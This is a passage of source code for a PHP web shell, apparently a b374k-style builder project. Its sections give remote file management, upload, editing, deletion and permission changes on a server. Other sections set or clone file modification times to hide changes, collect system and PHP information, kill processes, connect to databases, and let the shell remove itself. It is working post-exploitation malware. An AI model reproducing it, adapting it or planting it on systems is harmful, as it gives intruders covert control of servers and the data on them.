| 291 | sAjax(tText('fail', 'Fail')); 292 | break; 293 | case 'copy': 294 | if ($p['dl']){ 295 | $fNames = Array(); 296 | $total = count($p['dl']); 297 | if ($p['b'][(strlen($p['b']) - 1)] !== DS) $p['b'] .= DS; 298 | for ($z = 0; $total > $z; $z++){ 299 | $fileinfo = pathinfo($p['fl'] . $p['dl'][$z]); 300 | if (!file_exists($p['fl'] . $p['dl'][$z])) 301 | sAjax(tText('notexist', 'Object does not exist')); 302 | 303 | if (is_dir($p['fl'] . $p['dl'][$z])){ 304 | if (!@recursiveCopy($p['fl'] . $p['dl'][$z], $p['b'] . $fileinfo['basename'] . DS)) $fNames[] = $p['dl'][$z]; 305 | } else { 306 | if (!@copy($p['fl'] . $p['dl'][$z], $p['b'] . $fileinfo['basename'])) $fNames[] = $p['dl'][$z]; 307 | } 308 | } 309 | 310 | sAjax(hsc(tText('total', 'Total') . ': ' . $total . ' [' . tText('correct', 'correct') . ' ' . ($total - count($fNames)) . ' - ' . tText('failed', 'failed') . ' '. count($fNames) . (count($fNames) == 0 ? '' : ' (' . implode(', ', $fNames) . ')') . ']')); 311 | } 312 | break; 313 | case 'del': 314 | if (!file_exists($p['a'])) 315 | sAjax(tText('notexist', 'Object does not exist')); 316 | 317 | sAjax((is_dir($p['a']) ? @delTree($p['a']) : @unlink($p['a'])) ? 'OK' : tText('fail', 'Fail!')); 318 | break; 319 | case 'rdel': 320 | if ($p['dl']){ 321 | $fNames = Array(); 322 | $total = count($p['dl']); 323 | for ($z = 0; $total > $z; $z++){ 324 | if (is_dir($p['fl'] . $p['dl'][$z])){ 325 | if (!@delTree($p['fl'] . $p['dl'][$z])) $fNames[] = $p['dl'][$z]; 326 | } else { 327 | if (!@unlink($p['fl'] . $p['dl'][$z])) $fNames[] = $p['dl'][$z]; 328 | } 329 | } 330 | sAjax(tText('total', 'Total') . ': ' . $total . ' [' . tText('correct', 'correct') . ' ' . ($total - count($fNames)) . ' - ' . tText('failed', 'failed') . ' '. count($fNames) . (count($fNames) == 0 ? '' : ' (' . implode(', ', $fNames) . ')') . ']'); 331 | } 332 | break; 333 | case 'dl': 334 | if (!file_exists($p['fl'])) 335 | sAjax(tText('notexist', 'Object does not exist')); 336 | 337 | $fileinfo = pathinfo($p['fl']); 338 | header('Content-Type: application/x-' . $fileinfo['extension']); 339 | header('Content-Disposition: attachment; filename=' . $fileinfo['basename']); 340 | header('Content-Length: ' . filesize($p['fl'])); 341 | readfile($p['fl']); 342 | exit; 343 | break; 344 | case 'edit': 345 | if (file_put_contents($p['a'], $p['fc'])) 346 | sAjax(tText('ok', 'Ok!')); 347 | 348 | tText('fail', 'Fail!'); 349 | break; 350 | case 'mdate': 351 | if (!@file_exists($p['a'])) 352 | sAjax(tText('notexist', 'Object does not exist')); 353 | 354 | if (isset($p['b'])) $time = strtotime($p['b']); 355 | else $time = strtotime($p['y'] . '-' . $p['m'] . '-' . $p['d'] . ' ' . $p['h'] . ':' . $p['i'] . ':' . $p['s']); 356 | sAjax(@touch($p['a'], $time, $time) ? tText('ok', 'Ok!') : tText('fail', 'Fail!')); 357 | break; 358 | case 'mdatec': 359 | if (!@file_exists($p['a']) || !@file_exists($p['b'])) 360 | sAjax(tText('notexist', 'Object does not exist')); 361 | 362 | $time = @filemtime($p['b']); 363 | sAjax(@touch($p['a'], $time, $time) ? tText('ok', 'Ok!') : tText('fail', 'Fail!')); 364 | break; 365 | case 'mpers': 366 | if (!file_exists($p['a'])) 367 | sAjax(tText('notexist', 'Object does not exist')); 368 | 369 | sAjax(@chmod($p['a'], base_convert($p['b'], 8, 10)) ? 'OK' : tText('fail', 'Fail!')); 370 | break; 371 | case 'ren': 372 | if (!file_exists($p['a'])) 373 | sAjax(tText('notexist', 'Object does not exist')); 374 | 375 | sAjax(@rename($p['a'], $p['b']) ? 'OK' : tText('fail', 'Fail!')); 376 | break; 377 | } 378 | } else if (@$p['md'] === 'info'){ 379 | if (file_exists($p['t'])){ 380 | $sBuff .= '

' . tText('information', 'Information') . ' [' . mLink(tText('goback', 'Go Back'), 'ajaxLoad("me=filemanager&dir=' . rawurlencode(getUpPath($p['t'])) . '")') . ']

381 | 382 | 383 | 384 | 385 | 386 | 387 | 388 | '; 389 | 390 | if (!$isWIN){ 391 | $ow = posix_getpwuid(fileowner($p['t'])); 392 | $gr = posix_getgrgid(filegroup($p['t'])); 393 | $sBuff .= ''; 396 | } 397 | $sBuff .= '
' . tText('path', 'Path') . '' . hsc($p['t']) . '
' . tText('size', 'Size') . '' . sizecount(filesize($p['t'])) . '
' . tText('md5', 'MD5') . '' . strtoupper(@md5_file($p['t'])) . '
' . tText('sha1', 'SHA1') . '' . strtoupper(@sha1_file($p['t'])) . '
' . tText('ctime', 'Create time') . '' . date($config['datetime'], filectime($p['t'])) . '
' . tText('atime', 'Access time') . '' . date($config['datetime'], fileatime($p['t'])) . '
' . tText('mtime', 'Modify time') . '' . date($config['datetime'], filemtime($p['t'])) . '
' . tText('chmodchown', 'Chmod/Chown') . '' . 394 | ($ow['name'] ? $ow['name'] : fileowner($p['t'])) . '/' . ($gr['name'] ? $gr['name'] : filegroup($p['t'])) . 395 | '
' . tText('perms', 'Perms') . '' . vPermsColor($p['t']) . '

'; 398 | 399 | $fp = @fopen($p['t'], 'rb'); 400 | if ($fp){ 401 | $sBuff .= '

402 | [' . mLink(tText('hl', 'Highlight'), 'ajaxLoad("me=filemanager&md=info&hl=n&t=" + euc(dpath(this, false)))') . '] 403 | [' . mLink(tText('hlp', 'Highlight +'), 'ajaxLoad("me=filemanager&md=info&hl=p&t=" + euc(dpath(this, false)))') . '] 404 | [' . mLink(tText('hd', 'Hexdump'), 'ajaxLoad("me=filemanager&md=info&hd=n&t=" + euc(dpath(this, false)))') . '] 405 | [' . mLink(tText('hdp', 'Hexdump preview'), 'ajaxLoad("me=filemanager&md=info&hd=p&t=" + euc(dpath(this, false)))') . '] 406 | [' . mLink(tText('edit', 'Edit'), 'ajaxLoad("me=filemanager&md=edit&t=" + euc(dpath(this, false)))') . '] 407 |



'; 408 | 409 | if (isset($p['hd'])){ 410 | if ($p['hd'] === 'n'){ 411 | $sBuff .= 'Hex Dump
'; 412 | $str = fread($fp, filesize($p['t'])); 413 | } else { 414 | $sBuff .= 'Hex Dump Preview
'; 415 | $str = fread($fp, $config['hd_lines'] * $config['hd_rows']); 416 | } 417 | 418 | $show_offset = '00000000
'; 419 | $show_hex = ''; 420 | $show_sBuff = ''; 421 | $counter = 0; 422 | $str_len = strlen($str); 423 | for ($i = 0; $i < $str_len; $i++){ 424 | $counter++; 425 | $show_hex .= sprintf('%02X', ord($str[$i])) . ' '; 426 | switch (ord($str[$i])){ 427 | case 0 : 428 | case 9 : 429 | case 10: 430 | case 13: 431 | case 32: $show_sBuff .= ' '; 432 | break; 433 | default: $show_sBuff .= $str[$i]; 434 | } 435 | if ($counter === $config['hd_rows']){ 436 | $counter = 0; 437 | if ($i + 1 < $str_len) 438 | $show_offset .= sprintf('%08X', $i + 1) . '
'; 439 | $show_hex .= '
'; 440 | $show_sBuff .= "\n"; 441 | } 442 | } 443 | $sBuff .= '
' . $show_offset . '
' . $show_hex . '
' . hsc($show_sBuff) . '

'; 444 | } else if (isset($p['hl'])){ 445 | if (function_exists('highlight_file')){ 446 | if ($p['hl'] === 'n'){ 447 | $sBuff .= 'Highlight:
' . 448 | '
' . highlight_file($p['t'], true) . '
'; 449 | } else { 450 | $code = substr(highlight_file($p['t'], true), 36, -15); 451 | //if (substr_count($code, '
') > substr_count($code, "\n")) 452 | $lines = explode('
', $code); 453 | $pl = strlen(count($lines)); 454 | $sBuff .= 'Highlight +:
'; 455 | 456 | foreach($lines as $i => $line){ 457 | $sBuff .= sprintf('%s | %s
', str_pad($i + 1, $pl, '0', STR_PAD_LEFT), $line); 458 | } 459 | 460 | $sBuff .= '
'; 461 | } 462 | } else 463 | $sBuff .= sDialog(tText('hlerror', 'highlight_file() dont exist!')); 464 | } else { 465 | $str = @fread($fp, filesize($p['t'])); 466 | $sBuff .= 'File:
' . 467 | '

'; 468 | } 469 | } 470 | } else 471 | $sBuff .= sDialog(tText('accessdenied', 'Access denied')); 472 | 473 | @fclose($fp); 474 | } else if (@$p['md'] === 'edit'){ 475 | if (file_exists($p['t'])){ 476 | $filemtime = explode('-', @date('Y-m-d-H-i-s', filemtime($p['t']))); 477 | $sBuff .= '

' . tText('edit', 'Edit') . ' [' . mLink(tText('goback', 'Go Back'), 'ajaxLoad("me=filemanager&dir=' . rawurlencode(getUpPath($p['t'])) . '")') . ']

478 |
479 | ' . mHide('me', 'file') . mHide('md', 'tools') . mHide('ac', 'mdatec') . ' 480 |

' . tText('e1', 'Clone folder/file last modified time') . '

481 | ' . mInput('a', $p['t'], tText('e2', 'Alter folder/file'), 1, '', 'style="width: 99%;" disabled') . ' 482 | ' . mInput('b', '', tText('e3', 'Reference folder/file (fullpath)'), 1, '', 'style="width: 99%;"') . ' 483 | ' . mSubmit(tText('go', 'Go!'), 'uiupdate(0)') . ' 484 |


485 |
486 | ' . mHide('me', 'file') . mHide('md', 'tools') . mHide('ac', 'mdate') . ' 487 |

' . tText('e4', 'Set last modified time') . '

488 | ' . mInput('a', $p['t'], tText('e5', 'Current folder/file (fullpath)'), 1, '', 'style="width: 99%;" disabled') . ' 489 |

490 | ' . tText('year', 'year') . ': ' . mInput('y', $filemtime[0], '', '', '', 'size="4"') . ' 491 | ' . tText('month', 'month') . ': ' . mInput('m', $filemtime[1], '', '', '', 'size="2"') . ' 492 | ' . tText('day', 'day') . ': ' . mInput('d', $filemtime[2], '', '', '', 'size="2"') . ' 493 | ' . tText('hour', 'hour') . ': ' . mInput('h', $filemtime[3], '', '', '', 'size="2"') . ' 494 | ' . tText('minute', 'minute') . ': ' . mInput('i', $filemtime[4], '', '', '', 'size="2"') . ' 495 | ' . tText('second', 'second') . ': ' . mInput('s', $filemtime[5], '', '', '', 'size="2"') . ' 496 |

497 | ' . mSubmit(tText('go', 'Go!'), 'uiupdate(1)') . ' 498 |


'; 499 | 500 | $fp = @fopen($p['t'], 'r'); 501 | if ($fp) { 502 | $sBuff .= '
503 | ' . mHide('me', 'file') . mHide('md', 'tools') . mHide('ac', 'edit') . mHide('a', $p['t']) . ' 504 |

' . tText('e5', 'Edit file') . '

505 |

506 | [' . mLink(tText('hl', 'Highlight'), 'ajaxLoad("me=filemanager&md=info&hl=n&t=" + euc(dpath(this, false)))') . '] 507 | [' . mLink(tText('hlp', 'Highlight +'), 'ajaxLoad("me=filemanager&md=info&hl=p&t=" + euc(dpath(this, false)))') . '] 508 | [' . mLink(tText('hd', 'Hexdump'), 'ajaxLoad("me=filemanager&md=info&hd=n&t=" + euc(dpath(this, false)))') . '] 509 | [' . mLink(tText('hdp', 'Hexdump preview'), 'ajaxLoad("me=filemanager&md=info&hd=p&t=" + euc(dpath(this, false)))') . '] 510 |


511 | 512 | ' . mSubmit(tText('go', 'Go!'), 'uiupdate(2)') . ' 513 |


'; 514 | } 515 | @fclose($fp); 516 | } 517 | } else { 518 | if (isset($p['ac']) && $p['ac'] === 'up') 519 | $sBuff .= sDialog(@copy($_FILES['upf']['tmp_name'], $p['dir'] . DS . $_FILES['upf']['name']) ? tText('upload', 'Upload') . ' ' . tText('ok', 'Ok!') : tText('fail', 'Fail!')); 520 | 521 | $currentdir = $shelldir; 522 | if (!empty($p['dir'])){ 523 | $p['dir'] = fixRoute($p['dir']); 524 | if (substr($p['dir'], -1) !== DS) $p['dir'] = $p['dir'] . DS; 525 | $currentdir = $p['dir']; 526 | } 527 | 528 | $sBuff .= '
'; 529 | 530 | $free = @disk_free_space($currentdir); 531 | $all = @disk_total_space($currentdir); 532 | if ($free) $sBuff .= '

' . tText('freespace', 'Free space') . ' ' . sizecount($free) . ' ' . tText('of', 'of') . ' ' . sizecount($all) . ' (' . round(100 / ($all / $free), 2) . '%)

'; 533 | 534 | $fp = ''; 535 | $lnks = ''; 536 | foreach (explode(DS, $currentdir) as $tmp){ 537 | if (!empty($tmp) || empty($fp)){ 538 | $fp .= $tmp . DS; 539 | $lnks .= mLink($tmp . DS, 'godisk(this)', "data-path='{$fp}'") . ' '; 540 | } 541 | } 542 | unset($fp, $tmp); 543 | 544 | $sBuff .= ' 545 | 546 | 547 | 550 | 551 |
' . tText('acdir', 'Current directory') . ' [' . (@is_writable($currentdir) ? tText('writable', 'Writable') : tText('no', 'No') . ' ' . tText('writable', 'Writable')) . ($isWIN ? '' : ', ' . getChmod($currentdir)) . ']:
  548 |  ' . mInput('goui', $currentdir, '', '', '', 'size="100%"') . ' 549 |  ' . mSubmit(tText('go', 'Go!'), 'godirui()', '', 'style="width: 5px;display: inline;"') . '
 '. $lnks .'
552 |
'; 553 | 554 | if ($isWIN){ 555 | $sBuff .= tText('drive', 'Drive') . ': '; 556 | if (class_exists('COM')){ 557 | $obj = new COM('scripting.filesystemobject'); 558 | if ($obj && is_object($obj)){ 559 | $DriveTypeDB = array(0 => tText('unknow', 'Unknow'), 560 | 1 => tText('removable', 'Removable'), 561 | 2 => tText('fixed', 'Fixed'), 562 | 3 => tText('network', 'Network'), 563 | 4 => tText('cdrom', 'CDRom'), 564 | 5 => tText('ramdisk', 'RAM Disk')); 565 | 566 | foreach ($obj->Drives as $drive){ 567 | $sBuff .= ' [' . $DriveTypeDB[$drive->DriveType] . ' ' . $drive->Path . '] '; 570 | else 571 | $sBuff .= '"if (confirm(\'' . tText('derror', 'Make sure that disk is avarible, otherwise an error may occur.') . '\')) godisk(this);return false;" title="' . tText('type', 'Type') . ':' . $DriveTypeDB[$drive->DriveType] . '">' . $DriveTypeDB[$drive->DriveType] . ' ' . $drive->Path . ']'; 572 | } 573 | } 574 | } else { 575 | foreach (range('A', 'Z') as $letter) 576 | if (@is_readable("{$letter}:\\")) 577 | $sBuff .= ' [' . mLink("{$letter}:", 'godisk(this)', "data-path='{$letter}:\\'") . '] '; 578 | } 579 | $sBuff .= '
'; 580 | } 581 | 582 | $sBuff .= tText('fmso', 'Show only') . ': ' . (isset($p['fm_mode']) ? $p['fm_mode'] : tText('all', 'All')) . ' ' . 583 | tText('fmow', 'Only writable') . ': ' . (isset($p['fm_onlyW']) ? tText('yes', 'yes') : tText('no', 'no')) . ' ' . 584 | tText('fmrl', 'Recursive listing') . ': ' . (isset($p['fm_rec']) ? tText('yes', 'yes') : tText('no', 'no')) . '
' . 585 | mLink(tText('webroot', 'WebRoot'), 'godisk(this)', "data-path='{$_SERVER['DOCUMENT_ROOT']}'") . ' | ' . 586 | mLink(tText('createdir', 'Create directory'), 'showUI("cdir", this)') . ' | ' . 587 | mLink(tText('createfile', 'Create file'), 'showUI("cfile", this)') . ' | ' . 588 | mLink(tText('upload', 'Upload'), 'up()') . ' | ' . 589 | mLink(tText('showfmextras', 'Show extra tools'), 'showFMExtras()') . '

'; 590 | 591 | if (is_dir($currentdir)){ 592 | $bg = 2; 593 | $c = $d = 0; 594 | $drf = fixRoute($_SERVER['DOCUMENT_ROOT']); 595 | $baseURL = str_replace(DS, '/', str_replace($drf, '', $currentdir)); 596 | $isLinked = strncasecmp($drf, $currentdir, strlen($_SERVER['DOCUMENT_ROOT'])) === 0 ? true : false; 597 | 598 | $sBuff .= ' 599 | 600 | 601 | 602 | 603 | 604 | ' . (! $isWIN ? '' : '') . ' 605 | 606 | 607 | '; 608 | 609 | $fDataD = $fDataF = array(); 610 | fileList($p['fm_mode'], $currentdir, $config['FMLimit'], $p['pg'], isset($p['fm_onlyW']), $p['fm_find'], isset($p['fm_rec'])); 611 | 612 | @natcasesort($fDataD); 613 | foreach ($fDataD as $file){ 614 | $d++; 615 | $ft = filemtime($currentdir . $file); 616 | $sBuff .= ' 617 | 618 | 619 | 620 | 621 | ' . (!$isWIN ? '' : '') . ' 622 | 628 | '; 629 | } 630 | unset($fDataD); 631 | 632 | @natcasesort($fDataF); 633 | foreach ($fDataF as $file){ 634 | $c++; 635 | $ft = filemtime($currentdir . $file); 636 | $sBuff .= ' 637 | 644 | 645 | ' . (!$isWIN ? '' : '') . ' 646 | '; 653 | } 654 | unset($fDataF); 655 | 656 | $sBuff .= ' 657 | 658 | 660 | 663 | 664 |
' . mLink('
', 'godir(this, false)') . '		' . tText('name', 'Name') . '' . tText('date', 'Date') . '' . tText('size', 'Size') . '' . tText('chmodchown', 'Chmod/Chown') . '' . tText('actions', 'Actions') . '
' . $file . '		' . date($config['datetime'], $ft) . '[?]' . vPermsColor($currentdir . $file) . '
' . getUser($currentdir . $file) . '		 623 |
624 |
625 |
626 |
627 |
'; 638 | 639 | if ($currentdir . $file === __file__) $sBuff .= '
' . $file . ''; 640 | else if($isLinked) $sBuff .= showIcon($file) . ' ' . $file . ''; 641 | else $sBuff .= showIcon($file) . ' ' . $file; 642 | 643 | $sBuff .= '		' . date($config['datetime'], $ft) . '' . sizecount(filesize64($currentdir . $file)) . '' . vPermsColor($currentdir . $file) . '
' . getUser($currentdir . $file) . '		 647 |
648 |
649 |
650 |
651 |
652 |
' . mCheck('chkall', '', 'CheckAll(this.form);') . '' . tText('selected', 'Selected') . ': ' . mLink(tText('download', 'Download'), 'showUISec("comp")') . ' | ' . 659 | mLink(tText('del', 'Del'), 'showUISec("rdel")') . ' | ' . mLink(tText('copy', 'Copy'), 'showUISec("copy")') . ' | ' . mLink(tText('uncompress', 'Uncompress'), 'showUISec("uncomp")') . ' 661 | ' . $d . ' ' . tText('dirs', 'Directories') . ' / ' . $c . ' ' . tText('fils', 'Files') . ' 662 |
' . mHide('base', $currentdir); 665 | } else 666 | $sBuff .= sDialog(tText('accessdenied', 'Access denied')); 667 | 668 | if ($config['FMLimit']) 669 | $sBuff .= genPaginator($p['pg'], ($c < $config['FMLimit'] ? $p['pg'] : -1)); 670 | } -------------------------------------------------------------------------------- /builder/sections/info.php: -------------------------------------------------------------------------------- 1 | ' . mHide('me', 'info') . ' 22 |

' . tText('info', 'Info') . '

23 |

' . tText('in0', 'PHP config param (ex: magic_quotes_gpc)') . ' 24 | ' . mInput('pvn', '') . ' ' . mSubmit(tText('go', 'Go!'), 'uiupdate(0)', '', 'style="width: 5px;display: inline;"') . '

25 | '; 26 | 27 | //resume 28 | $dis_func = get_cfg_var('disable_functions'); 29 | !$dis_func && $dis_func = 'No'; 30 | 31 | $sBuff .= "

Resume

" . 32 | ""; 71 | 72 | //server misc info - based on b374k 73 | $sBuff .= "

Server Info

" . 74 | ""; 121 | 122 | 123 | // cpu info 124 | if(!$isWIN){ 125 | if ($i_buff=trim(read_file("/proc/cpuinfo"))){ 126 | $sBuff .= "

CPU Info

" . 127 | ""; 145 | } 146 | 147 | // mem info 148 | if ($i_buff=trim(read_file("/proc/meminfo"))){ 149 | $sBuff .= "

Memory Info

" . 150 | ""; 161 | } 162 | 163 | // partition 164 | if ($i_buff=trim(read_file("/proc/partitions"))){ 165 | $sBuff .= "

Partitions Info

" . 166 | ""; 183 | } 184 | } 185 | 186 | $phpinfo = array("PHP General" => INFO_GENERAL, "PHP Configuration" => INFO_CONFIGURATION, "PHP Modules" => INFO_MODULES, "PHP Environment" => INFO_ENVIRONMENT, "PHP Variables" => INFO_VARIABLES); 187 | foreach($phpinfo as $p=>$i){ 188 | $sBuff .= "

{$p}

"; 189 | ob_start(); 190 | eval("phpinfo($i);"); 191 | $b = ob_get_contents(); 192 | ob_end_clean(); 193 | if (preg_match("/(.*?)<\/body>/is", $b, $r)){ 194 | $body = str_replace(array(',', ';', '&'), array(', ', '; ', '&'), $r[1]); 195 | $body = str_replace('(.*?)<\/tr>/", "", $body); 197 | $body = preg_replace("//", '', $body); 198 | $body = preg_replace("//", '', $body); 199 | $sBuff .= ""; 200 | } 201 | } -------------------------------------------------------------------------------- /builder/sections/process.php: -------------------------------------------------------------------------------- 1 | $i; $i++){ 5 | if (function_exists('posix_kill')) 6 | $tmp .= (posix_kill($p['ps'][$i], '9') ? 'Process with pid ' . $p['ps'][$i] . ' has been successfully killed' : 'Unable to kill process with pid ' . $p['ps'][$i]) . '
'; 7 | else { 8 | if($isWIN) $tmp .= execute("taskkill /F /PID {$p['ps'][$i]}") . '
'; 9 | else $tmp .= execute("kill -9 {$p['ps'][$i]}") . '
'; 10 | } 11 | } 12 | 13 | $sBuff .= sDialog($tmp); 14 | } 15 | 16 | $h = 'ps aux'; 17 | $wexp = ' '; 18 | if ($isWIN){ 19 | $h = 'tasklist /V /FO csv'; 20 | $wexp = '","'; 21 | } 22 | 23 | $res = execute($h); 24 | if (trim($res) === '') $sBuff = sDialog('Error getting process list'); 25 | else { 26 | if(!$isWIN) $res = preg_replace('#\ +#', ' ', $res); 27 | $psarr = explode("\n", $res); 28 | $h = true; 29 | $tblcount = 0; 30 | $wcount = count(explode($wexp, $psarr[0])); 31 | 32 | $sBuff .= '
'; 33 | foreach($psarr as $psa){ 34 | if(trim($psa) !== ''){ 35 | if($h){ 36 | $h = false; 37 | $psln = explode($wexp, $psa, $wcount); 38 | $sBuff .= ''; 39 | foreach($psln as $p) 40 | $sBuff .= ''; 41 | $sBuff .= ''; 42 | } else { 43 | $psln = explode($wexp, $psa, $wcount); 44 | $sBuff .= ''; 45 | $tblcount = 0; 46 | foreach($psln as $p){ 47 | $pid = trim(trim($psln[1]), '"'); 48 | if(trim($p) === '') $p = ' '; 49 | if($tblcount == 0){ 50 | $sBuff .= '' . 51 | '' . 52 | ''; 53 | $tblcount++; 54 | } else { 55 | $tblcount++; 56 | if($tblcount == count($psln)) $sBuff .= ""; 57 | else $sBuff .= ""; 58 | } 59 | } 60 | $sBuff .= ''; 61 | } 62 | } 63 | } 64 | 65 | $sBuff .= '' . 66 | '
action' . trim(trim($p), '"') . '
kill' . trim(trim($p), '"') . '".trim(trim($p), '"')."".trim(trim($p), '"')."
' . mCheck('chkall', '', 'CheckAll(this.form);') . '' . mSubmit(tText('ps0', 'kill selected'), 'ajaxLoad(serialize(d.forms[0]))') . 67 | '
' . mHide('me', 'process') . '
'; 68 | } -------------------------------------------------------------------------------- /builder/sections/selfremove.php: -------------------------------------------------------------------------------- 1 | ' . tText('fail', 'Fail!') . '
'; 8 | } 9 | 10 | $r = mt_rand(1337, 9999); 11 | $sBuff .= '
' . tText('del', 'Del') . ': ' . __file__ . '

' . tText('reminfo', 'For confirmation enter this code') . ': ' . $r . '' . 12 | mHide('me', 'srm') . mHide('rc', $r) . 13 | mInput('uc', '') . '   
'; -------------------------------------------------------------------------------- /builder/sections/sql.js: -------------------------------------------------------------------------------- 1 | function dbexec(c){ 2 | empty("dbRes"); 3 | append("dbRes", "
"); 4 | ajax(serialize(d.forms[0]) + '&code=' + c, function(r){ 5 | empty("dbRes"); 6 | append("dbRes", r); 7 | uiUpdateControls(); 8 | }); 9 | } 10 | 11 | function dbengine(t){ 12 | d.getElementById("su").className = "hide"; 13 | d.getElementById("sp").className = "hide"; 14 | d.getElementById("so").className = "hide"; 15 | 16 | if ((t.value === "odbc") || (t.value === "pdo")){ 17 | d.getElementById("sh").innerHTML = "DSN/Connection String"; 18 | d.getElementById("su").className = ""; 19 | d.getElementById("sp").className = ""; 20 | } else if ((t.value === "sqlite") || (t.value === "sqlite3")){ 21 | d.getElementById("sh").innerHTML = "DB File"; 22 | } else { 23 | d.getElementById("sh").innerHTML = "Host"; 24 | d.getElementById("su").className = ""; 25 | d.getElementById("sp").className = ""; 26 | d.getElementById("so").className = ""; 27 | } 28 | } 29 | 30 | function dbhistory(a){ 31 | if (a == "s"){ 32 | o = {history: []}; 33 | if (sessionStorage.getItem( config.consNames.sqlclog ) != null) 34 | o = JSON.parse(sessionStorage.getItem( config.consNames.sqlclog )); 35 | 36 | o.history.push({"type": d.getElementById("type").value, "host": d.getElementById("host").value, 37 | "port": d.getElementById("port").value, "user": d.getElementById("user").value, "pass": d.getElementById("pass").value}); 38 | sessionStorage.setItem( config.consNames.sqlclog , JSON.stringify(o)); 39 | } else if (sessionStorage.getItem( config.consNames.sqlclog ) != null) { 40 | s = ""; 41 | o = JSON.parse(sessionStorage.getItem( config.consNames.sqlclog )); 42 | for (i = 0; i < o.history.length; i++){ 43 | u = "me=sql&host=" + o.history[i].host + "&port=" + o.history[i].port + "&user=" + o.history[i].user + "&pass=" + o.history[i].pass + "&type=" + o.history[i].type; 44 | s += "[" + o.history[i].type.toUpperCase() + "] " + o.history[i].user + "@" + o.history[i].host + "' . tText('go', 'Go!') . '
"; 45 | } 46 | 47 | if (s != "") prepend("content", "
" + s + "
"); 48 | }//TODO add delete a entry 49 | } -------------------------------------------------------------------------------- /builder/sections/sql.php: -------------------------------------------------------------------------------- 1 | $user, 'PWD'=>$pass); 14 | return @sqlsrv_connect($host,$coninfo); 15 | } 16 | } else if($type === 'pgsql'){ 17 | $hosts = explode(':', $host); 18 | if(count($hosts)==2) $host_str = 'host='.$hosts[0].' port='.$hosts[1]; 19 | else $host_str = 'host='.$host; 20 | if(function_exists('pg_connect')) return @pg_connect($host_str.' user='.$user.' password='.$pass); 21 | } else if($type === 'oracle'){ 22 | if(function_exists('oci_connect')) return @oci_connect($user, $pass, $host); 23 | } else if($type === 'sqlite3'){ 24 | if(class_exists('SQLite3')) if(!empty($host)) return new SQLite3($host); 25 | } else if($type === 'sqlite'){ 26 | if(function_exists('sqlite_open')) return @sqlite_open($host); 27 | } else if($type === 'odbc'){ 28 | if(function_exists('odbc_connect')) return @odbc_connect($host, $user, $pass); 29 | } else if($type === 'pdo'){ 30 | if(class_exists('PDO')) if(!empty($host)) return new PDO($host, $user, $pass); 31 | } 32 | return false; 33 | } 34 | 35 | function sql_query($type, $query, $con){ 36 | if ($type === 'mysql'){ 37 | if(function_exists('mysqli_query')) return mysqli_query($con,$query); 38 | else if(function_exists('mysql_query')) return mysql_query($query); 39 | } else if($type === 'mssql'){ 40 | if(function_exists('mssql_query')) return mssql_query($query); 41 | else if(function_exists('sqlsrv_query')) return sqlsrv_query($con,$query); 42 | } else if($type === 'pgsql') return pg_query($query); 43 | else if($type === 'oracle') return oci_execute(oci_parse($con, $query)); 44 | else if($type === 'sqlite3') return $con->query($query); 45 | else if($type === 'sqlite') return sqlite_query($con, $query); 46 | else if($type === 'odbc') return odbc_exec($con, $query); 47 | else if($type === 'pdo') return $con->query($query); 48 | } 49 | 50 | function sql_num_fields($type, $result, $con){ 51 | if ($type === 'mysql'){ 52 | if(function_exists('mysqli_field_count')) return mysqli_field_count($con); 53 | else if (function_exists('mysql_num_fields')) return mysql_num_fields($result); 54 | } else if($type === 'mssql'){ 55 | if(function_exists('mssql_num_fields')) return mssql_num_fields($result); 56 | else if(function_exists('sqlsrv_num_fields')) return sqlsrv_num_fields($result); 57 | } else if($type === 'pgsql') return pg_num_fields($result); 58 | else if($type === 'oracle') return oci_num_fields($result); 59 | else if($type === 'sqlite3') return $result->numColumns(); 60 | else if($type === 'sqlite') return sqlite_num_fields($result); 61 | else if($type === 'odbc') return odbc_num_fields($result); 62 | else if($type === 'pdo') return $result->columnCount(); 63 | } 64 | 65 | function sql_field_name($type,$result,$i){ 66 | if ($type === 'mysql'){ 67 | if(function_exists('mysqli_fetch_fields')){ 68 | $metadata = mysqli_fetch_fields($result); 69 | if(is_array($metadata)) return $metadata[$i]->name; 70 | } else if (function_exists('mysql_field_name')) return mysql_field_name($result,$i); 71 | } else if($type === 'mssql'){ 72 | if(function_exists('mssql_field_name')) return mssql_field_name($result,$i); 73 | else if(function_exists('sqlsrv_field_metadata')){ 74 | $metadata = sqlsrv_field_metadata($result); 75 | if(is_array($metadata)) return $metadata[$i]['Name']; 76 | } 77 | } else if($type === 'pgsql') return pg_field_name($result,$i); 78 | else if($type === 'oracle') return oci_field_name($result,$i+1); 79 | else if($type === 'sqlite3') return $result->columnName($i); 80 | else if($type === 'sqlite') return sqlite_field_name($result,$i); 81 | else if($type === 'odbc') return odbc_field_name($result,$i+1); 82 | else if($type === 'pdo'){ 83 | $res = $result->getColumnMeta($i); 84 | return $res['name']; 85 | } 86 | } 87 | 88 | function sql_fetch_data($type,$result){ 89 | if ($type === 'mysql'){ 90 | if(function_exists('mysqli_fetch_row')) return mysqli_fetch_row($result); 91 | else if(function_exists('mysql_fetch_row')) return mysql_fetch_row($result); 92 | } else if($type === 'mssql'){ 93 | if(function_exists('mssql_fetch_row')) return mssql_fetch_row($result); 94 | else if(function_exists('sqlsrv_fetch_array')) return sqlsrv_fetch_array($result,1); 95 | } else if($type === 'pgsql') return pg_fetch_row($result); 96 | else if($type === 'oracle') return oci_fetch_row($result); 97 | else if($type === 'sqlite3') return $result->fetchArray(1); 98 | else if($type === 'sqlite') return sqlite_fetch_array($result,1); 99 | else if($type === 'odbc') return odbc_fetch_array($result); 100 | else if($type === 'pdo') return $result->fetch(2); 101 | } 102 | 103 | function sql_num_rows($type,$result){ 104 | if ($type === 'mysql'){ 105 | if(function_exists('mysqli_num_rows')) return mysqli_num_rows($result); 106 | else if(function_exists('mysql_num_rows')) return mysql_num_rows($result); 107 | } else if($type === 'mssql'){ 108 | if(function_exists('mssql_num_rows')) return mssql_num_rows($result); 109 | else if(function_exists('sqlsrv_num_rows')) return sqlsrv_num_rows($result); 110 | } else if($type === 'pgsql') return pg_num_rows($result); 111 | else if($type === 'oracle') return oci_num_rows($result); 112 | else if($type === 'sqlite3'){ 113 | $metadata = $result->fetchArray(); 114 | if(is_array($metadata)) return $metadata['count']; 115 | } else if($type === 'sqlite') return sqlite_num_rows($result); 116 | else if($type === 'odbc') return odbc_num_rows($result); 117 | else if($type === 'pdo') return $result->rowCount(); 118 | } 119 | 120 | function sql_close($type,$con){ 121 | if ($type === 'mysql'){ 122 | if(function_exists('mysqli_close')) return mysqli_close($con); 123 | else if(function_exists('mysql_close')) return mysql_close($con); 124 | } else if($type === 'mssql'){ 125 | 